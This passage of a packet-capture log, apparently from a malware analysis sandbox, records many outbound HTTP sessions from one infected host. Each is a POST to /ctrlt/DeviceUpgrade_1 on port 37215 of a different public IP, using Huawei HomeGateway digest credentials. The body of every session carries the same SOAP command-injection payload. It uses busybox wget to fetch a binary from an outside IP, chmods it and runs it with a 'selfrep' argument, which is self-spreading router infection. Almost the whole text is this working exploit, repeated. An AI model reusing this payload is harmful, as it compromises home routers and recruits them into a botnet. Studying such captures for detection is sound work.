69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  434192.168.2.135723441.203.105.12237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277724028 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  435192.168.2.135453441.190.27.6137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.277743101 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  436192.168.2.134511841.190.210.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278098106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  437192.168.2.1334836124.133.236.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278119087 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  438192.168.2.1349982157.242.154.737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278143883 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  439192.168.2.134860820.24.125.22837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278161049 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  440192.168.2.1360516114.175.136.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278183937 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  441192.168.2.1336448195.210.238.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278203964 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  442192.168.2.1339690143.237.4.4137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278228998 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  443192.168.2.135049270.127.31.13137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278244972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  444192.168.2.133764841.108.63.1237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:14.278260946 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
